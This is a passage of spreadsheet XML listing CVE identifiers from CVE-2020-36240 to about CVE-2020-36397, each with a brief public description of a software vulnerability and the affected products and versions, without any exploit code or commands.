    <t>u'A potential buffer overflow exists due to integer overflow when parsing handler options due to wrong data type usage in operation' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, Kamorta, MDM9150, MDM9205, MDM9206, MDM9207C, MDM9607, MDM9615, MDM9625, MDM9635M, MDM9640, MDM9645, MDM9650, MDM9655, MSM8905, MSM8909, MSM8909W, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996AU, MSM8998, Nicobar, QCM2150, QCN7605, QCS605, QCS610, QM215, Rennell, SA415M, SA515M, Saipan, SC7180, SC8180X, SDA660, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SDM850, SDX20, SDX24, SDX55, SM6150, SM7150, SM8150, SXR1130</t>
  </si>
  <si>
    <t>CVE-2020-36240</t>
  </si>
  <si>
    <t>The ResourceDownloadRewriteRule class in Crowd before version 4.0.4, and from version 4.1.0 before 4.1.2 allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check.</t>
  </si>
  <si>
    <t>CVE-2020-36241</t>
  </si>
  <si>
    <t>autoar-extractor.c in GNOME gnome-autoar through 0.2.4, as used by GNOME Shell, Nautilus, and other software, allows Directory Traversal during extraction because it lacks a check of whether a file's parent is a symlink to a directory outside of the intended extraction location.</t>
  </si>
  <si>
    <t>CVE-2020-36242</t>
  </si>
  <si>
    <t>In the cryptography package before 3.3.2 for Python, certain sequences of update calls to symmetrically encrypt multi-GB values could result in an integer overflow and buffer overflow, as demonstrated by the Fernet class.</t>
  </si>
  <si>
    <t>CVE-2020-36243</t>
  </si>
  <si>
    <t>The Patient Portal of OpenEMR 5.0.2.1 is affected by a Command Injection vulnerability in /interface/main/backup.php. To exploit the vulnerability, an authenticated attacker can send a POST request that executes arbitrary OS commands via shell metacharacters.</t>
  </si>
  <si>
    <t>CVE-2020-36244</t>
  </si>
  <si>
    <t>The daemon in GENIVI diagnostic log and trace (DLT), is vulnerable to a heap-based buffer overflow that could allow an attacker to remotely execute arbitrary code on the DLT-Daemon (versions prior to 2.18.6).</t>
  </si>
  <si>
    <t>CVE-2020-36245</t>
  </si>
  <si>
    <t>GramAddict through 1.2.3 allows remote attackers to execute arbitrary code because of use of UIAutomator2 and ATX-Agent. The attacker must be able to reach TCP port 7912, e.g., by being on the same Wi-Fi network.</t>
  </si>
  <si>
    <t>CVE-2020-36246</t>
  </si>
  <si>
    <t>Amaze File Manager before 3.5.1 allows attackers to obtain root privileges via shell metacharacters in a symbolic link.</t>
  </si>
  <si>
    <t>CVE-2020-36247</t>
  </si>
  <si>
    <t>Open OnDemand before 1.5.7 and 1.6.x before 1.6.22 allows CSRF.</t>
  </si>
  <si>
    <t>CVE-2020-36248</t>
  </si>
  <si>
    <t>The ownCloud application before 2.15 for Android allows attackers to use adb to include a PIN preferences value in a backup archive, and consequently bypass the PIN lock feature by restoring from this archive.</t>
  </si>
  <si>
    <t>CVE-2020-36249</t>
  </si>
  <si>
    <t>The File Firewall before 2.8.0 for ownCloud Server does not properly enforce file-type restrictions for public shares.</t>
  </si>
  <si>
    <t>CVE-2020-3625</t>
  </si>
  <si>
    <t>When making query to DSP capabilities, Stack out of bounds occurs due to wrong buffer length configured for DSP attributes in Snapdragon Auto, Snapdragon Consumer IOT, Snapdragon Mobile in SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-36250</t>
  </si>
  <si>
    <t>In the ownCloud application before 2.15 for Android, the lock protection mechanism can be bypassed by moving the system date/time into the past.</t>
  </si>
  <si>
    <t>CVE-2020-36251</t>
  </si>
  <si>
    <t>ownCloud Server before 10.3.0 allows an attacker, who has received non-administrative access to a group share, to remove everyone else's access to that share.</t>
  </si>
  <si>
    <t>CVE-2020-36252</t>
  </si>
  <si>
    <t>ownCloud Server 10.x before 10.3.1 allows an attacker, who has one outgoing share from a victim, to access any version of any file by sending a request for a predictable ID number.</t>
  </si>
  <si>
    <t>CVE-2020-36254</t>
  </si>
  <si>
    <t>scp.c in Dropbear before 2020.79 mishandles the filename of . or an empty filename, a related issue to CVE-2018-20685.</t>
  </si>
  <si>
    <t>CVE-2020-36255</t>
  </si>
  <si>
    <t>An issue was discovered in IdentityModel (aka ScottBrady.IdentityModel) before 1.3.0. The Branca implementation allows an attacker to modify and forge authentication tokens.</t>
  </si>
  <si>
    <t>CVE-2020-3626</t>
  </si>
  <si>
    <t>Any application can bind to it and exercise the APIs due to no protection for AIDL uimlpaservice in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables in APQ8053, APQ8096AU, APQ8098, MSM8905, MSM8909W, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996AU, MSM8998, Nicobar, QCA6574AU, QCS605, QM215, Rennell, Saipan, SDA660, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-36277</t>
  </si>
  <si>
    <t>Leptonica before 1.80.0 allows a denial of service (application crash) via an incorrect left shift in pixConvert2To8 in pixconv.c.</t>
  </si>
  <si>
    <t>CVE-2020-36278</t>
  </si>
  <si>
    <t>Leptonica before 1.80.0 allows a heap-based buffer over-read in findNextBorderPixel in ccbord.c.</t>
  </si>
  <si>
    <t>CVE-2020-36279</t>
  </si>
  <si>
    <t>Leptonica before 1.80.0 allows a heap-based buffer over-read in rasteropGeneralLow, related to adaptmap_reg.c and adaptmap.c.</t>
  </si>
  <si>
    <t>CVE-2020-3628</t>
  </si>
  <si>
    <t>Improper access due to socket opened by the logging application without specifying localhost address in Snapdragon Consumer IOT, Snapdragon Mobile in APQ8053, Rennell, SDX20</t>
  </si>
  <si>
    <t>CVE-2020-36280</t>
  </si>
  <si>
    <t>Leptonica before 1.80.0 allows a heap-based buffer over-read in pixReadFromTiffStream, related to tiffio.c.</t>
  </si>
  <si>
    <t>CVE-2020-36281</t>
  </si>
  <si>
    <t>Leptonica before 1.80.0 allows a heap-based buffer over-read in pixFewColorsOctcubeQuantMixed in colorquant1.c.</t>
  </si>
  <si>
    <t>CVE-2020-36282</t>
  </si>
  <si>
    <t>JMS Client for RabbitMQ 1.x before 1.15.2 and 2.x before 2.2.0 is vulnerable to unsafe deserialization that can result in code execution via crafted StreamMessage data.</t>
  </si>
  <si>
    <t>CVE-2020-36283</t>
  </si>
  <si>
    <t>HID OMNIKEY 5427 and OMNIKEY 5127 readers are vulnerable to CSRF when using the EEM driver (Ethernet Emulation Mode). By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed HTTP request to upload a configuration file to the device. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities.</t>
  </si>
  <si>
    <t>CVE-2020-36284</t>
  </si>
  <si>
    <t>Union Pay up to 3.4.93.4.9, for android, contains a CWE-347: Improper Verification of Cryptographic Signature vulnerability, allows attackers to shop for free in merchants' websites and mobile apps, via a crafted authentication code (MAC) which is generated based on a secret key which is NULL.</t>
  </si>
  <si>
    <t>CVE-2020-36285</t>
  </si>
  <si>
    <t>Union Pay up to 3.3.12, for iOS mobile apps, contains a CWE-347: Improper Verification of Cryptographic Signature vulnerability, allows attackers to shop for free in merchants' websites and mobile apps, via a crafted authentication code (MAC) which is generated based on a secret key which is NULL.</t>
  </si>
  <si>
    <t>CVE-2020-36286</t>
  </si>
  <si>
    <t>The membersOf JQL search function in Jira Server and Data Center before version 8.5.13, from version 8.6.0 before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to determine if a group exists &amp; members of groups if they are assigned to publicly visible issue field.</t>
  </si>
  <si>
    <t>CVE-2020-36287</t>
  </si>
  <si>
    <t>The dashboard gadgets preference resource of the Atlassian gadgets plugin used in Jira Server and Jira Data Center before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to obtain gadget related settings via a missing permissions check.</t>
  </si>
  <si>
    <t>CVE-2020-36288</t>
  </si>
  <si>
    <t>The issue navigation and search view in Jira Server and Data Center before version 8.5.12, from version 8.6.0 before version 8.13.4, and from version 8.14.0 before version 8.15.1 allows remote attackers to inject arbitrary HTML or JavaScript via a DOM Cross-Site Scripting (XSS) vulnerability caused by parameter pollution.</t>
  </si>
  <si>
    <t>CVE-2020-36289</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the QueryComponentRendererValue!Default.jspa endpoint. The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.</t>
  </si>
  <si>
    <t>CVE-2020-3629</t>
  </si>
  <si>
    <t>u'Stack out of bound issue occurs when making query to DSP capabilities due to wrong assumption was made on determining the buffer size for the DSP attributes' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in Bitra, Kamorta, Rennell, SC7180, SDM845, SM6150, SM7150, SM8150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-36290</t>
  </si>
  <si>
    <t>The Livesearch macro in Confluence Server and Data Center before version 7.4.5, from version 7.5.0 before 7.6.3, and from version 7.7.0 before version 7.7.4 allows remote attackers with permission to edit a page or blog to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the page excerpt functionality.</t>
  </si>
  <si>
    <t>CVE-2020-3630</t>
  </si>
  <si>
    <t>Possibility of out of bound access while processing the responses from video firmware in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8009, APQ8053, APQ8096AU, APQ8098, Kamorta, MDM9150, MDM9206, MDM9207C, MDM9607, MDM9640, MDM9650, MSM8909W, MSM8917, MSM8953, MSM8996, MSM8996AU, MSM8998, Nicobar, QCM2150, QCS405, QCS605, QM215, Rennell, SA415M, SA6155P, Saipan, SC8180X, SDA660, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SDX20, SDX24, SDX55, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-36306</t>
  </si>
  <si>
    <t>Redmine before 4.0.7 and 4.1.x before 4.1.1 has XSS via the back_url field.</t>
  </si>
  <si>
    <t>CVE-2020-36307</t>
  </si>
  <si>
    <t>Redmine before 4.0.7 and 4.1.x before 4.1.1 has stored XSS via textile inline links.</t>
  </si>
  <si>
    <t>CVE-2020-36308</t>
  </si>
  <si>
    <t>Redmine before 4.0.7 and 4.1.x before 4.1.1 allows attackers to discover the subject of a non-visible issue by performing a CSV export and reading time entries.</t>
  </si>
  <si>
    <t>CVE-2020-36309</t>
  </si>
  <si>
    <t>ngx_http_lua_module (aka lua-nginx-module) before 0.10.16 in OpenResty allows unsafe characters in an argument when using the API to mutate a URI, or a request or response header.</t>
  </si>
  <si>
    <t>CVE-2020-36310</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel before 5.8. arch/x86/kvm/svm/svm.c allows a set_memory_region_test infinite loop for certain nested page faults, aka CID-e72436bc3a52.</t>
  </si>
  <si>
    <t>CVE-2020-36311</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel before 5.9. arch/x86/kvm/svm/sev.c allows attackers to cause a denial of service (soft lockup) by triggering destruction of a large SEV VM (which requires unregistering many encrypted regions), aka CID-7be74942f184.</t>
  </si>
  <si>
    <t>CVE-2020-36312</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel before 5.8.10. virt/kvm/kvm_main.c has a kvm_io_bus_unregister_dev memory leak upon a kmalloc failure, aka CID-f65886606c2d.</t>
  </si>
  <si>
    <t>CVE-2020-36313</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel before 5.7. The KVM subsystem allows out-of-range access to memslots after a deletion, aka CID-0774a964ef56. This affects arch/s390/kvm/kvm-s390.c, include/linux/kvm_host.h, and virt/kvm/kvm_main.c.</t>
  </si>
  <si>
    <t>CVE-2020-36314</t>
  </si>
  <si>
    <t>fr-archive-libarchive.c in GNOME file-roller through 3.38.0, as used by GNOME Shell and other software, allows Directory Traversal during extraction because it lacks a check of whether a file's parent is a symlink in certain complex situations. NOTE: this issue exists because of an incomplete fix for CVE-2020-11736.</t>
  </si>
  <si>
    <t>CVE-2020-36315</t>
  </si>
  <si>
    <t>In RELIC before 2020-08-01, RSA PKCS#1 v1.5 signature forgery can occur because certain checks of the padding (and of the first two bytes) are inadequate. NOTE: this requires that a low public exponent (such as 3) is being used. The product, by default, does not generate RSA keys with such a low number.</t>
  </si>
  <si>
    <t>CVE-2020-36316</t>
  </si>
  <si>
    <t>In RELIC before 2021-04-03, there is a buffer overflow in PKCS#1 v1.5 signature verification because garbage bytes can be present.</t>
  </si>
  <si>
    <t>CVE-2020-36317</t>
  </si>
  <si>
    <t>In the standard library in Rust before 1.49.0, String::retain() function has a panic safety problem. It allows creation of a non-UTF-8 Rust string when the provided closure panics. This bug could result in a memory safety violation when other string APIs assume that UTF-8 encoding is used on the same string.</t>
  </si>
  <si>
    <t>CVE-2020-36318</t>
  </si>
  <si>
    <t>In the standard library in Rust before 1.49.0, VecDeque::make_contiguous has a bug that pops the same element more than once under certain condition. This bug could result in a use-after-free or double free.</t>
  </si>
  <si>
    <t>CVE-2020-36319</t>
  </si>
  <si>
    <t>Insecure configuration of default ObjectMapper in com.vaadin:flow-server versions 3.0.0 through 3.0.5 (Vaadin 15.0.0 through 15.0.4) may expose sensitive data if the application also uses e.g. @RestController</t>
  </si>
  <si>
    <t>CVE-2020-3632</t>
  </si>
  <si>
    <t>u'Incorrect validation of ring context fetched from host memory can lead to memory overflow' in Snapdragon Compute, Snapdragon Mobile in QSM8350, SC7180, SDX55, SDX55M, SM6150, SM6250, SM6250P, SM7125, SM7150, SM7150P, SM7250, SM7250P, SM8150, SM8150P, SM8250, SM8350, SM8350P, SXR2130, SXR2130P</t>
  </si>
  <si>
    <t>CVE-2020-36320</t>
  </si>
  <si>
    <t>Unsafe validation RegEx in EmailValidator class in com.vaadin:vaadin-server versions 7.0.0 through 7.7.21 (Vaadin 7.0.0 through 7.7.21) allows attackers to cause uncontrolled resource consumption by submitting malicious email addresses.</t>
  </si>
  <si>
    <t>CVE-2020-36321</t>
  </si>
  <si>
    <t>Improper URL validation in development mode handler in com.vaadin:flow-server versions 2.0.0 through 2.4.1 (Vaadin 14.0.0 through 14.4.2), and 3.0 prior to 5.0 (Vaadin 15 prior to 18) allows attacker to request arbitrary files stored outside of intended frontend resources folder.</t>
  </si>
  <si>
    <t>CVE-2020-36322</t>
  </si>
  <si>
    <t>An issue was discovered in the FUSE filesystem implementation in the Linux kernel before 5.10.6, aka CID-5d069dbe8aaf. fuse_do_getattr() calls make_bad_inode() in inappropriate situations, causing a system crash. NOTE: the original fix for this vulnerability was incomplete, and its incompleteness is tracked as CVE-2021-28950.</t>
  </si>
  <si>
    <t>CVE-2020-36323</t>
  </si>
  <si>
    <t>In the standard library in Rust before 1.52.0, there is an optimization for joining strings that can cause uninitialized bytes to be exposed (or the program to crash) if the borrowed string changes after its length is checked.</t>
  </si>
  <si>
    <t>CVE-2020-36324</t>
  </si>
  <si>
    <t>Wikimedia Quarry analytics-quarry-web before 2020-12-15 allows Reflected XSS because app.py does not explicitly set the application/json content type.</t>
  </si>
  <si>
    <t>CVE-2020-36325</t>
  </si>
  <si>
    <t>** DISPUTED ** An issue was discovered in Jansson through 2.13.1. Due to a parsing error in json_loads, there's an out-of-bounds read-access bug. NOTE: the vendor reports that this only occurs when a programmer fails to follow the API specification.</t>
  </si>
  <si>
    <t>CVE-2020-36326</t>
  </si>
  <si>
    <t>PHPMailer 6.1.8 through 6.4.0 allows object injection through Phar Deserialization via addAttachment with a UNC pathname. NOTE: this is similar to CVE-2018-19296, but arose because 6.1.8 fixed a functionality problem in which UNC pathnames were always considered unreadable by PHPMailer, even in safe contexts. As an unintended side effect, this fix eliminated the code that blocked addAttachment exploitation.</t>
  </si>
  <si>
    <t>CVE-2020-36327</t>
  </si>
  <si>
    <t>Bundler 1.16.0 through 2.2.9 and 2.2.11 through 2.2.16 sometimes chooses a dependency source based on the highest gem version number, which means that a rogue gem found at a public source may be chosen, even if the intended choice was a private gem that is a dependency of another private gem that is explicitly depended on by the application. NOTE: it is not correct to use CVE-2021-24105 for every "Dependency Confusion" issue in every product.</t>
  </si>
  <si>
    <t>CVE-2020-36328</t>
  </si>
  <si>
    <t>A flaw was found in libwebp in versions before 1.0.1. A heap-based buffer overflow in function WebPDecodeRGBInto is possible due to an invalid check for buffer size. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-36329</t>
  </si>
  <si>
    <t>A flaw was found in libwebp in versions before 1.0.1. A use-after-free was found due to a thread being killed too early. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-3633</t>
  </si>
  <si>
    <t>Array out of bound may occur while playing mp3 file as no check is there on offset if it is greater than the buffer allocated or not in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8009, APQ8053, APQ8096AU, APQ8098, Kamorta, MDM9206, MDM9207C, MDM9607, MSM8905, MSM8909W, MSM8917, MSM8953, MSM8996AU, MSM8998, QCS405, QCS605, QM215, Rennell, Saipan, SDA660, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SDX20, SM6150, SM7150, SM8150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-36330</t>
  </si>
  <si>
    <t>A flaw was found in libwebp in versions before 1.0.1. An out-of-bounds read was found in function ChunkVerifyAndAssign. The highest threat from this vulnerability is to data confidentiality and to the service availability.</t>
  </si>
  <si>
    <t>CVE-2020-36331</t>
  </si>
  <si>
    <t>A flaw was found in libwebp in versions before 1.0.1. An out-of-bounds read was found in function ChunkAssignData. The highest threat from this vulnerability is to data confidentiality and to the service availability.</t>
  </si>
  <si>
    <t>CVE-2020-36332</t>
  </si>
  <si>
    <t>A flaw was found in libwebp in versions before 1.0.1. When reading a file libwebp allocates an excessive amount of memory. The highest threat from this vulnerability is to the service availability.</t>
  </si>
  <si>
    <t>CVE-2020-36333</t>
  </si>
  <si>
    <t>themegrill-demo-importer before 1.6.2 does not require authentication for wiping the database, because of a reset_wizard_actions hook.</t>
  </si>
  <si>
    <t>CVE-2020-36334</t>
  </si>
  <si>
    <t>themegrill-demo-importer before 1.6.3 allows CSRF, as demonstrated by wiping the database.</t>
  </si>
  <si>
    <t>CVE-2020-3634</t>
  </si>
  <si>
    <t>u'Multiple Read overflows issue due to improper length check while decoding Generic NAS transport/EMM info' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables in APQ8053, APQ8096AU, APQ8098, Kamorta, MDM9150, MDM9205, MDM9206, MDM9607, MDM9625, MDM9635M, MDM9640, MDM9645, MDM9650, MDM9655, MSM8905, MSM8909W, MSM8917, MSM8953, MSM8996AU, MSM8998, Nicobar, QCM2150, QCS605, QCS610, QM215, Rennell, SA415M, Saipan, SC7180, SDA660, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SDM850, SDX20, SDX24, SDX55, SM6150, SM7150, SM8150, SXR1130</t>
  </si>
  <si>
    <t>CVE-2020-3635</t>
  </si>
  <si>
    <t>Stack based overflow If the maximum number of arguments allowed per request in perflock exceeds in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables in APQ8053, APQ8096AU, APQ8098, MSM8909W, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996AU, MSM8998, Nicobar, QCM2150, QCS605, QM215, Rennell, Saipan, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-3636</t>
  </si>
  <si>
    <t>u'Out of bound writes happen when accessing usage_table header entry beyond the memory allocated for the header' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Mobile, Snapdragon Wired Infrastructure and Networking in Kamorta, QCS404, QCS610, Rennell, SC7180, SDX55, SM6150, SM7150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-36363</t>
  </si>
  <si>
    <t>Amazon AWS CloudFront TLSv1.2_2019 allows TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 and TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384, which some entities consider to be weak ciphers.</t>
  </si>
  <si>
    <t>CVE-2020-36364</t>
  </si>
  <si>
    <t>An issue was discovered in Smartstore (aka SmartStoreNET) before 4.1.0. Administration/Controllers/ImportController.cs allows path traversal (for copy and delete actions) in the ImportController.Create method via a TempFileName field.</t>
  </si>
  <si>
    <t>CVE-2020-36365</t>
  </si>
  <si>
    <t>Smartstore (aka SmartStoreNET) before 4.1.0 allows CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit open redirect.</t>
  </si>
  <si>
    <t>CVE-2020-36366</t>
  </si>
  <si>
    <t>Stack overflow vulnerability in parse_value Cesanta MJS 1.20.1, allows remote attackers to cause a Denial of Service (DoS) via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2020-36367</t>
  </si>
  <si>
    <t>Stack overflow vulnerability in parse_block Cesanta MJS 1.20.1, allows remote attackers to cause a Denial of Service (DoS) via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2020-36368</t>
  </si>
  <si>
    <t>Stack overflow vulnerability in parse_statement Cesanta MJS 1.20.1, allows remote attackers to cause a Denial of Service (DoS) via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2020-36369</t>
  </si>
  <si>
    <t>Stack overflow vulnerability in parse_statement_list Cesanta MJS 1.20.1, allows remote attackers to cause a Denial of Service (DoS) via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2020-36370</t>
  </si>
  <si>
    <t>Stack overflow vulnerability in parse_unary Cesanta MJS 1.20.1, allows remote attackers to cause a Denial of Service (DoS) via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2020-36371</t>
  </si>
  <si>
    <t>Stack overflow vulnerability in parse_mul_div_rem Cesanta MJS 1.20.1, allows remote attackers to cause a Denial of Service (DoS) via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2020-36372</t>
  </si>
  <si>
    <t>Stack overflow vulnerability in parse_plus_minus Cesanta MJS 1.20.1, allows remote attackers to cause a Denial of Service (DoS) via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2020-36373</t>
  </si>
  <si>
    <t>Stack overflow vulnerability in parse_shifts Cesanta MJS 1.20.1, allows remote attackers to cause a Denial of Service (DoS) via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2020-36374</t>
  </si>
  <si>
    <t>Stack overflow vulnerability in parse_comparison Cesanta MJS 1.20.1, allows remote attackers to cause a Denial of Service (DoS) via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2020-36375</t>
  </si>
  <si>
    <t>Stack overflow vulnerability in parse_equality Cesanta MJS 1.20.1, allows remote attackers to cause a Denial of Service (DoS) via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2020-36376</t>
  </si>
  <si>
    <t>An issue was discovered in the list function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.</t>
  </si>
  <si>
    <t>CVE-2020-36377</t>
  </si>
  <si>
    <t>An issue was discovered in the dump function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.</t>
  </si>
  <si>
    <t>CVE-2020-36378</t>
  </si>
  <si>
    <t>An issue was discovered in the packageCmd function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.</t>
  </si>
  <si>
    <t>CVE-2020-36379</t>
  </si>
  <si>
    <t>An issue was discovered in the remove function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.</t>
  </si>
  <si>
    <t>CVE-2020-3638</t>
  </si>
  <si>
    <t>u'An Unaligned address or size can propagate to the database due to improper page permissions and can lead to improper access control' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wired Infrastructure and Networking in Agatti, Bitra, Kamorta, QCA6390, QCS404, QCS610, Rennell, SA515M, SC7180, SC8180X, SDX55, SM6150, SM7150, SM8150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-36380</t>
  </si>
  <si>
    <t>An issue was discovered in the crunch function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.</t>
  </si>
  <si>
    <t>CVE-2020-36381</t>
  </si>
  <si>
    <t>An issue was discovered in the singleCrunch function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.</t>
  </si>
  <si>
    <t>CVE-2020-36382</t>
  </si>
  <si>
    <t>OpenVPN Access Server 2.7.3 to 2.8.7 allows remote attackers to trigger an assert during the user authentication phase via incorrect authentication token data in an early phase of the user authentication resulting in a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-36383</t>
  </si>
  <si>
    <t>PageLayer before 1.3.5 allows reflected XSS via the font-size parameter.</t>
  </si>
  <si>
    <t>CVE-2020-36384</t>
  </si>
  <si>
    <t>PageLayer before 1.3.5 allows reflected XSS via color settings.</t>
  </si>
  <si>
    <t>CVE-2020-36385</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel before 5.10. drivers/infiniband/core/ucma.c has a use-after-free because the ctx is reached via the ctx_list in some ucma_migrate_id situations where ucma_close is called, aka CID-f5449e74802c.</t>
  </si>
  <si>
    <t>CVE-2020-36386</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel before 5.8.1. net/bluetooth/hci_event.c has a slab out-of-bounds read in hci_extended_inquiry_result_evt, aka CID-51c19bf3d5cf.</t>
  </si>
  <si>
    <t>CVE-2020-36387</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel before 5.8.2. fs/io_uring.c has a use-after-free related to io_async_task_func and ctx reference holding, aka CID-6d816e088c35.</t>
  </si>
  <si>
    <t>CVE-2020-36388</t>
  </si>
  <si>
    <t>In CiviCRM before 5.21.3 and 5.22.x through 5.24.x before 5.24.3, users may be able to upload and execute a crafted PHAR archive.</t>
  </si>
  <si>
    <t>CVE-2020-36389</t>
  </si>
  <si>
    <t>In CiviCRM before 5.28.1 and CiviCRM ESR before 5.27.5 ESR, the CKEditor configuration form allows CSRF.</t>
  </si>
  <si>
    <t>CVE-2020-3639</t>
  </si>
  <si>
    <t>u'When a non standard SIP sigcomp message is received from the network, then there may be chances of using more UDVM cycle or memory overflow' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables in APQ8009, APQ8017, APQ8037, APQ8053, MDM9250, MDM9607, MDM9628, MDM9640, MDM9650, MSM8108, MSM8208, MSM8209, MSM8608, MSM8905, MSM8909, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996AU, QCM4290, QCM6125, QCS410, QCS4290, QCS603, QCS605, QCS610, QCS6125, QM215, QSM8350, SA415M, SA6145P, SA6150P, SA6155P, SA8150P, SA8155, SA8155P, SA8195P, SC7180, SC8180X, SC8180X+SDX55, SC8180XP, SDA429W, SDA640, SDA660, SDA670, SDA845, SDA855, SDM1000, SDM429, SDM429W, SDM439, SDM450, SDM455, SDM630, SDM632, SDM636, SDM640, SDM660, SDM670, SDM710, SDM712, SDM845, SDM850, SDX24, SDX50M, SDX55, SDX55M, SM4125, SM4250, SM4250P, SM6115, SM6115P, SM6125, SM6150, SM6150P, SM6250, SM6250P, SM7125, SM7150, SM7150P, SM7250, SM7250P, SM8150, SM8150P, SM8350, SM8350P, SXR1120, SXR1130</t>
  </si>
  <si>
    <t>CVE-2020-36394</t>
  </si>
  <si>
    <t>pam_setquota.c in the pam_setquota module before 2020-05-29 for Linux-PAM allows local attackers to set their quota on an arbitrary filesystem, in certain situations where the attacker's home directory is a FUSE filesystem mounted under /home.</t>
  </si>
  <si>
    <t>CVE-2020-36395</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in the /admin/user/team component of LavaLite 5.8.0 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "New" parameter.</t>
  </si>
  <si>
    <t>CVE-2020-36396</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in the /admin/roles/role component of LavaLite 5.8.0 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "New" parameter.</t>
  </si>
  <si>
    <t>CVE-2020-36397</t>
  </si>
  <si>
